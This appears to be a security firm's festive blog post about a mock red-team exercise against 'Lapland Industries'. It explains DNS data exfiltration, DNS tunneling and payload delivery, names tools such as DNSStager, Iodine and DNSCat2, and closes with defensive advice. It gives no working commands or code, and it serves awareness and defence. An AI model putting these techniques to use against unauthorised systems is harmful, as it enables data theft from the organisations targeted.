Now that Cybaverse has gained access to the network at Lapland Industries, a test to see if large amounts of data can be transferred to an external source needs to be completed.
Data exfiltration is the unauthorised extraction of information or data outside of a company. This can be done maliciously by threat actors or unintentionally, by employees.
All threat actors are different and have different motives. If you hold personal information, threat actors may want to extract that information to sell to other cyber criminals to complete identity theft.
By extracting the data, cyber criminals can then store their own copy of the data, this stops them from being locked out of the system by a Blue Team or if manage detection and response protocols kick in. Data extraction doesn’t always have to be a direct breach of your system. For example an employee might send some company information to their personal email address, which later is compromised.
Yesterday, Cybaverse were able to compromise the designated Naughty or Nice list by embedding a payload onto the server. Once a threat actor can access your network there are a number of different ways they might look to extract data. This is usually done by dropping a piece of Malware onto the network, which would then send data back to the attacker’s server. Gruber Group often exfiltrate data using DNS, so that is the exfiltration method Cybaverse will test on their Red Team.
Exfiltrating data using DNS
DNS data exfiltration is a way to bypass outbound traffic restrictions in a network as few firewalls will block DNS queries because it is one of the most fundamental protocols in use on the Internet.
DNS tunneling takes advantage of this fact by using DNS requests to implement a command and control channel for malware. Inbound DNS traffic can carry commands to the malware, while outbound traffic can exfiltrate sensitive data or provide responses to the malware operator’s requests. This works because DNS is a very flexible protocol. There are very few restrictions on the data that a DNS request contains because it is designed to look for domain names of websites. Since almost anything can be a domain name, these fields can be used to carry sensitive information. These requests are designed to go to attacker-controlled DNS servers, ensuring that they can receive the requests and respond in the corresponding DNS replies.
Using DNS to deliver malware
DNS can even be used to deliver malware - a threat actor may use a tool such as DNSStager, an open-source tool that can hide malicious payloads over DNS. This is done by the hacker creating a malicious DNS server under their control that can break the malicious payload down into chunks and deliver over the appropriate channel. Each chunk is encrypted and this makes it extremely hard for these types of attack to be detected. Other tools such as Iodine or DNSCat2 may also be used to transfer data using this protocol
DNS Tunnelling
Cybaverse used DNSStager to deliver a secondary DNS Tunneling application as a proof of concept that Lapland Industries were also susceptible to this type of attack.
We always strive to offer the widest visibility possible on an engagement, often using multiple techniques to achieve the same goal. Using that DNS Tunneling application, Cybaverse were able to take advantage of the fact no SIEM was in place to detect high volumes of DNS traffic to a single domain, and successfully exfiltrated a designated fake Naughty or Nice list from the internal network.
Rest assured, at no point did the original naughty and nice list leave the network - even though our Head of Marketing was desperate to see if she had finally made it off the naughty list and onto the nice list for the first time in 20 years, the extreme confidentiality of the file meant it was out of scope.
Penetration testing or Red Team testing
Conducting tests to see if data can be exfiltrated from your business is the best way to highlight possible vulnerabilities. Cyber security experts are able to conduct a full audit and report which will allow you to put a robust plan to protect your data and intellectual property.
Data encryption
Encrypting the local data can protect data and ensure that if it is exfiltrated, then it is unrecognisable to the threat actor.
Security tools
There are several different security tools that can monitor and prevent the exfiltration of data. For example, cloud email security software that prevents data loss that stem from sending information to personal accounts.
Employee training
Employee training is also an effective way of minimising exfiltration risk. A simple policy or procedure, alongside annual training can help employees keep both their personal and company data safe.
Once Cybaverse had obtained the designated naughty or nice list, they updated Mr and Mrs Claus. Initial preventative steps were discussed and full detail will be provided in the final report. Tomorrow Cybaverse conducts an encryption simulation on the network, the final TTP to test.